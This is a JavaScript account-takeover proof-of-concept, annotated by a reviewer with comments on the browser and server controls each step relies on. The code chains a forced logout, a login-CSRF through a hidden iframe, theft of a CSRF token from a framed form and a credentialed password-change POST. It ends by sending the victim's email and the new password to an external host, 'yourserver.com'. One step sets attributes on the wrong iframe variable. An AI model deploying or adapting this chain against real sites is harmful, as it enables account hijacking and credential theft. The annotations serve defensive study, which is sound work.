// NOTE(review): this is the account-takeover proof-of-concept exactly as it appears on
// the page; the code is left untouched. The added comments record, for defenders, which
// browser and server-side controls each step depends on.
//
// Two properties of the chain are visible in the code itself:
//  - it reads the DOM of framed pages via iframe.contentDocument, which browsers only
//    allow when the framing page and the frame share an origin (same-origin policy);
//  - it sends credentialed cross-site requests (iframes of example.com pages and an
//    XMLHttpRequest with withCredentials = true), which only carry the session when the
//    site's cookies are sent in a cross-site context (no SameSite restriction) and the
//    site permits being framed (no X-Frame-Options / CSP frame-ancestors).
// Fixed timers (30 s, 40 s, 50 s) stand in for real load/login synchronisation.

//getting logout url with csrf token from source
// Reads the page's own embedded config JSON (element id 'conf') to find the logout link.
var y = JSON.parse(document.getElementById('conf').innerHTML);
var url = y.user.link.logOut
//First iframe to logout
// Step 1: load the logout URL in a hidden frame so the current session is ended.
var profileIframe = document.createElement('iframe');
profileIframe.setAttribute('src', 'https://example.com'+url);
profileIframe.setAttribute('id', 'pi');
document.body.appendChild(profileIframe);
document.getElementById('pi').onload = function() {
  //second iframe to login to victims google account
  // Step 2: frame the login page; the click below relies on the browser already
  // holding a session with the third-party identity provider (a login-CSRF pattern).
  var profileIframe1 = document.createElement('iframe');
  profileIframe1.setAttribute('src', 'https://example.com/login');
  profileIframe1.setAttribute('id', 'lo1');
  document.body.appendChild(profileIframe1);
  //waiting for 30 seconds for the iframe to load properly
  document.getElementById('lo1').onload = function() {
    setTimeout(function(){ load() }, 30000)
    function load()
    {
      // contentDocument access here is a same-origin read of the framed page.
      let iframe = document.getElementById('lo1');
      let inner = iframe.contentDocument || iframe.contentWindow.document;
      //Clicked google login in iframe to login to victim
      inner.getElementsByClassName("g_login")[1].click();
    }
    //wait 40 seconds to let login complete
    setTimeout(function(){ takeover() }, 40000)
    function takeover()
    {
      //Getting users parameters page url from source
      // Step 3: read the now-logged-in frame's config JSON for the account-settings link.
      let iframe_second = document.getElementById('lo1');
      let inner1 = iframe_second.contentDocument || iframe_second.contentWindow.document;
      var z = JSON.parse(inner1.getElementById('conf').innerHTML);
      var param = z.user.link.parameter;
      // opens third iframe to steal csrf token for pass change
      var profileIframe2 = document.createElement('iframe');
      profileIframe1.setAttribute('src', 'https://example.com'+param);
      profileIframe1.setAttribute('id', 'lo2');
      document.body.appendChild(profileIframe2);
      //waiting 50 seconds to let the third iframe load fully
      document.getElementById('lo2').onload = function() {
        setTimeout(function(){ csrf() }, 50000)
        //Stealing csrf token from parameters page
        // The anti-CSRF token is read straight out of the framed form (input id
        // 'password__token'); a token in the DOM does not protect against a script
        // that can already read that DOM.
        function csrf() {
          let iframe_csrf = document.getElementById('lo2');
          let inner_csrf = iframe_csrf.contentDocument || iframe_csrf.contentWindow.document;
          var csrf = inner_csrf.getElementById("password__token").value;
          //account takeover
          // Step 4: credentialed POST to the password-change endpoint with the token
          // and a hard-coded new password. Server-side, this request is distinguishable
          // only by Origin/Referer; a SameSite cookie policy would drop the session.
          var xhr = new XMLHttpRequest();
          xhr.open("POST", "https://example.com"+param+"/password", true);
          xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
          xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
          xhr.setRequestHeader("Content-Type", "application\/x-www-form-urlencoded");
          xhr.withCredentials = true;
          var body = "setNewPassword_first=passwordQ!&setNewPassword_second=passwordQ!&setNewPassword%5Bcreate%5D=&setNewPassword%5B_token%5D="+csrf;
          // The form body is copied byte-for-byte (charCodeAt) into a Uint8Array and
          // sent as a Blob rather than as a plain string.
          var aBody = new Uint8Array(body.length);
          for (var i = 0; i < aBody.length; i++)
            aBody[i] = body.charCodeAt(i);
          xhr.send(new Blob([aBody]));
          //send credentials,token to attacker
          // Exfiltration: the victim's email (from localStorage) and the new password
          // go out in the query string of a request to an external host. For detection,
          // this is the most visible artefact of the chain (proxy/CSP reports); a
          // connect-src restriction in CSP would block it.
          fetch("https://yourserver.com/email_password?=Email:"+localStorage.getItem('user_email')+" password:passwordQ!")
        }
      }
    }
  }
}